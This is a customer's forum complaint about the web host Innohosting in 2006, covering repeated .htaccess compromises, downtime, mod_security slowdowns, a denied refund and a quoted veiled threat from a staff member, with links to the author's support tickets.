In all honesty, this exploit was issued over 12 times in the past few weeks. The changes were quickly reversed by hand by our staff. The only way to eliminate the source was to let it happen and see how it happened in our process logs. This is why your .htaccess files went unchanged. We could have quickly corrected the file and gone unnoticed, but we would have to do the same only a few hours later on an ongoing schedule. The hardest things we had to bite on was to keep this information from our clients (you). All of this is documented in this ticket (http://www.innohosting.info/innohosting-htaccess-security-breech.html).
Obviously I was a suspect. Otherwise they would have corrected our .htaccess quickly... read it... that is what he wrote. He had to keep it from us, the client. Now keep this in mind a little later on. I guess I remain a suspect for a while... even though it is causing me all kinds of headaches.
11/16/06 Our site goes down again for about 10-15 minutes. I opened a ticket and reported it since it was beginning to be a common thing I figured we needed records. See this ticket (http://www.innohosting.info/innohosting-site-down.html).
11/19/06 Another security breech... actually this was the fourth one total. Yep... four (4) times our .htaccess file was replaced with malicious content. This is pretty serious stuff and I am told they can't figure out who is doing it and have no fix for it. Of course they have offered to move us, but what difference would it make? They can't protect us now, how they gonna protect us later? See this ticket (http://www.innohosting.info/innohosting-security-breech.html).
Now remember earlier I stated we had started noticing sluggish speeds back around 10/25/06. We had a few features that were giving us problems... I started documenting these problems in a thread in our forum and kept a log on all the problems we were experiencing. After trying several different things I finally decided it was time to open a ticket with vBulletin support in an attempt to figure out what was going on. Pages were not loading and we were having some serious issues. I was thinking it was a vBulletin issue since it was only happening on a few features. Anyway, I spend a couple of days with vBulletin going through everything possible. I uninstalled over a dozen modifications that took me days to get installed just so we could eliminate any possible culprits. We had to close the forum on numerous occasions to troubleshoot the problems. When it was all said and done... guess where the problem was... yep... it was Innohosting hardening the php and using mod_security. See below.
11/24/06 I open yet another ticket and asked about "hardened php patch" and "mod_security" being installed on the server. Of course they admit it but refuse to believe that it effects vBulletin and refuse to do anything about it. The bottom line is that they installed this about a month before and that's when our problems started. This entire time we are having issues and our site is running sluggish as a result of their security breeches. See this ticket (http://www.innohosting.info/innohosting-vbulletin-errors.html) for full details.
Can you imagine having the problems we were having and continuing to use their hosting service, even if they did agree to upgrade us to a VPS for a minimal increase in cost? One problem after another after another. It was never ending. Surely no one in their right mind would continue. No, absolutely not!
I began back on 11/13/06 looking for us a dedicated server because I had given up on shared hosting after having all these problems. But this experience was by far the worst. I thought RealWebHost and Hostww was pretty bad, but this one was by far much worse. The funny thing about these shared hosting companies is they all had constant excuses and seem to always blame it on someone else and they got terribly upset if the customer complained. I suppose we are simply supposed to keep our mouth shut and never say a word about the poor service we get? Who are we supposed to contact if it's not who sold us?
Now I'll have to hand it to Rameen for one thing he did for us. I suppose he was really feeling pretty bad about the lousy service we had experienced. On 11/25/06 our dedicated server was ready and we needed help moving our main account, Home Theater Shack. Rameen actually moved it to the new server for us. Of course I thanked him and told him I'd give them good props for helping us out. It was very generous of him to do this. There are your good props Rameen. What this boils down to is that initially I was not even going to bring all this up. I was just gonna let it go. I had just about made up my mind to leave our other forum we had with them where it was, since it was just getting started and there is very littel traffic to it. However... on 12/1/06 that site went down and was having database errors. Plus I got to thinking, it's gonna continue to have those feature errors and run sluggish as well because of the php hardening and mod_security. Not to mention we had yet another security breech. Obviously the software they installed on the server was not helping stop the security breeches but it was sure making our site sluggish. I decided it was best to go ahead and move it as well and did so.
Now, let me ask you (the reader) a question. If you were a legitimate, honest, above board company that intended on staying in business for a long time... if you were running a business with the utmost integrity and respect for your clients, would you make a client that had been through what we have been through pay a dime? You know if you go to a restaurant and get a really bad meal, you know, one of those kind that make you wanna throw up, they don't usually make you pay for it. At least they don't if they are a well respected and quality restaurant, right? Of course not!
Think about all that we've been through... it's a miracle we are even alive. Even after all that I was not even expecting to get a full refund, although I can say without hesitation that I would have never made anyone pay for such horrendous service. That I can guarantee you. What I thought they would at least have the decency to do would be refund us for the period of time that we would not be using their service. The monthly fee was $40, which was $480 a year. I had agreed with Rameen to pay annually for a discount. He knocked off $50 and I paid the $430, plus some more later on for the dedicated IP address. Anyway, we'll just work off the $430. Any respectable company (I would think) would at least say, okay you have had some real hassles with our service so we are gonna charge you the monthly rate of $40 for two months with no discount since you wouldn't be paying for a full year if you paid by the month. We'll refund you the $350 difference. So they would end up charging us $80 + the IP address charge for really poor performance. Fair enough.
Obviously they don't agree, because their policy states no refunds after 16 days. They advised me quickly that I would not be getting a refund. It really didn't matter to them that the service we received was the epitome of poor service. I started out being nice about it and asking politely, but nope... they immediately started finding fault with me... turning the tables to try and make the customer look like they are at fault. I'm not sure how much more unprofessional it can get. First of all, most reputable companies wouldn't have such a policy as to not refund for service not provided. Most would stand behind their services. Second, regardless of policy, if I had put a customer through what we have been through, I would have the moral decency to give them a complete refund. To top it all off, they finally accused me of blackmailing and threatening them as well as abusing their service. I don't see how telling the truth is blackmail... telling the truth is not a threat... it's fact! As far as abusing their services... get real, they abused us. It's pretty hard to abuse services when the service being provided is extremely poor to begin with. How do you abuse service you don't have. Again, this is simply a deceptive tactic they use to get around any moral and ethical decisions they might have to make. See this ticket (http://www.innohosting.info/innohosting-account-canceled.html).
Now let's talk about threats... below is what Rameen wrote towards the end of the ticket where I tried to get our account reinstated... this ticket (http://www.innohosting.info/innohosting-deny-account-access.html).
Rameen has accused me of editing the ticket and adding his threat. I went to the client support area of Innohosting and took a screen shot of that entire page. As you can see from the screen shot, it would be impossible for me to edit their page. Screen shot of threat. (http://www.innohosting.info/images/screenshotofthreat.gif)
Here is Rameen's threat...
That precious forum of yours is very valuable and I bet the more visitors you get, the more money you make from the ads...It would be a tremendous shame if something happened to it.
At least we will know who to pursue should our forum get hacked.
A few other facts concerning their uptime comments... with proof... in this thread (http://www.webhostingtalk.com/showpost.php?p=4247488&postcount=9) here at WebHostingTalk.com, he makes this post...
I have one server at HiVelocity... They are pretty good, and the support I get has been exceptional... I've had 100% uptime since I have been with them. I would recommend them.
Then in this thread (http://www.webhostingtalk.com/showpost.php?p=4162391&postcount=9) which was some time before the claim of 100%... he makes this post...
We are currently installing new software and extra security on one of our servers. The server required a restart, however the data center (HiVelocity) had been mislabeled this server and took them almost an hour to find it and reboot it. Otherwise downtime would of only been a couple of minutes. We did express our concern in this issue and it was more or less out of our hands... We have had no recent reports of downtime other than when we experienced the above problem. If at anytime you experience an outage we recommend you open a ticket and include a tracert so we can troubleshoot it.
Furthermore... notice that just a few posts below his post in that same thread that another customer complains about downtime on that same server...
And yes i'm also facing a lot of downtimes lately. I did inform this the same to Chris. He also mentioned the same problem as you did. But after that also, at times the server or may be network is going down.
So how exactly is it possible that they could have 100% uptime? By Rameen's own admission, it is not possible. Draw your own conclusions.
Hopefully, if you are with Innohosting now, your experience will not end up being the same, which is one of the purposes of this thread. Otherwise, they have some work to do if they want to be a viable candidate for hosting.
Now, Rameen will claim that I'm ignorant, which I may be, you read the above and tell me. If I am, so be it, but that still doesn't mean we should be treated the way we have. He will claim that I'm angry and will do and say whatever.... of course I'm angry... I have a right to be angry. However, I can do and say whatever I want... I am limited for obvious reason. He may claim that I've edited tickets, which is false... I have no reason to do such. The one ticket he claims I have edited is no longer even on their system... they deleted it shortly after I took a screen print of it to prove I did not edit it.
Consider the bottom line... do you wanna go through what we went through?
I will give Rameen and Chris the last word here and I'll say no more... they can have at it. I don't think I need to say any more. I'm sure most everyone can figure it out... facts are facts and had we had good service and performance without all the security breeches, we'd still be with them.